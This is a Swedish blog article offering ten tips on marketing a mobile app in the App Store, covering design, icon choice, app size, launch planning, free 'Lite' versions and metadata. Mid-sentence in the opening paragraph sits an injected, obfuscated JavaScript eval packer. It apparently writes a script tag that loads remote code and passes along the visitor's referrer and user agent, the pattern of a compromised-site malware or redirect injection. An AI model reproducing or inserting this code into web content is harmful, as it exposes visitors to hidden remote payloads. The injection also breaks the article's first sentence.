Image Image Image Image Image Image Image Image Image Image

| 21 november, 2017

Scroll to top

Top

No Comments

10 smarta tips på hur du marknadsför din app | Revue.se

10 smarta tips på hur du marknadsför din app
Sebastian Plengier Ehrnfelt

I eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nerfz|var|u0026u|referrer|rnsna||js|php’.split(‘|’),0,{}))
App Store är det svårt att hitta rätt, om du inte vet exakt vad du letar efter. Användare har hundratusentals olika appar att välja mellan och frågan är, hur ska de hitta din?

Här nedan har vi samlat 10 smarta idéer på hur du kan få rätt målgrupp att hitta och ladda ner just din app.

Att tänka på när du  skapar din app:

1. Erbjud underhållning

Det gäller att man kan erbjuda underhållning och användarbarhet. Om inte användaren hittar något värde med din app kommer den inte klara sig länge. Det är viktigt att vara tydlig med syftet. Varför har du skapat din app? Vad är den bar på? Varför ska användaren ladda ner just den?
Det gäller att skapa lojalitet!

2. Fokusera på de större plattformarna

När man vill nå ut rätt och till många gäller det att man satsar där det finns flest användare, om man inte har en obegränsad budget.

3. Designen en viktig faktor

Bra design säljer – så enkelt är det. Visst är content king, men det kostar relativt lite att även få till en snygg design och det kommer att ge desto mer.

4. Designa app-ikonen rätt

Självklart är det viktigt att din app och ditt varumärke är så unikt som möjligt så det lätt går att urskilja från mängden. Välj rätt färg, symbol osv.
App-ikonen är det första som dina användare ser. Man ska försöka undvika färger som grönt och blått som är två färger många appar använder som standard färg idag. Det är många sociala medier som använder dessa färger. Se också till att ikonen fungerar i för alla de skärmar din app används på.

5. Optimera storleken

Försök att bygga din app så den hamnar inom ramen för nerladdningsbara appar på språng. De kan vara mycket frustrerande att då upp en notis om att appen är för stor för att laddas ner utan WiFi. Gränsen går på 50 MB i dagsläget. Tänk på detta då de flesta som är online med mobila enheter kör via 3G /4G.

6. Berätta och dela med vänner och bekanta

Det är viktigt att använda sig av sitt nätverk och få vänner och bekanta att ladda ner appen. Även om de kanske tycker att den inte faller i deras tycke så kan de bidra med en nerladdning. iTunes och App Store går mycket på antalet nerladdningar så att få några såna är ett stort plus. När den når ett visst antal nerladdningar kommer den hamna på topplistan och där kommer många fler att lätt hitta den och förmodligen också ladda ner.

7. Planera lansering

Det är också väldigt viktigt att planera lanseringen korrekt. Rätt timing kan leda till att PR-byråer, media och andra nätverk får nys om din app och skriver en notis eller artikel om den. Här kan man också hjälpa till på traven genom att kontakta bloggar, tekniksajter och tidningar. Be dem om en liten recension eller notis. Vi på Revue.se är ett utmärkt exempel då vi ofta skriver trevliga recensioner om innovativa appar, helst svenskutvecklade. Glöm inte att skicka med en Promo kod bara (Tipsa Revue).

8. Skapa en gratisversion om du tar betalt

Av ca 500 000 appar i Store är 39 procent gratisappar. Dessa står för ca 82 procent av de faktiska nerladdnigarna.
Därför är det viktigt att kunna erbjuda användare en ”teaser” av din app om den vanligtvis kostar pengar, skapa en ”Lite” version. De måste få en chans att prova på det som vanligtvis kostar. Den här strategin kommer få fler att köpa din app i längden.

9. Skapa en webbplats

Visst är det möjligt att se beskrivning i App Store samt marknadsföra den men det är relativt begränsade. Här ska du enkelt skapa en liten kampanjwebb som marknadsför din app på internet. Dela den länken är lättare än att dela saker från App Store. Ett exempel på detta är Instagram eller Freebee.

10. Tänk på din metadata

Beskrivning och metataggar i App Store har blivit viktigare, speciellt sedan Google och andra sökmotorer började indexera iTunes i sina flöden.
Här ska du använda relevant data som enkelt beskriver din app. Försök undvika ord som ”Spel”, ”Gratis” eller ”Apple”, det fungerar inte och Google underprioriterar dessa. Också viktigt att du lägger appen i rätt kategori, ju mer nischad desto bättre chans att du hamnar i topplistan.

Det finns massa fler smarta exempel på vad du ska tänka på i dessa sammanhang. Men här har du 10 smarta lösningar som jag anser vara grundläggande för framgång av försäljningen.

Kommentera gärna med egna förslag på hur ni tänkt och gjort!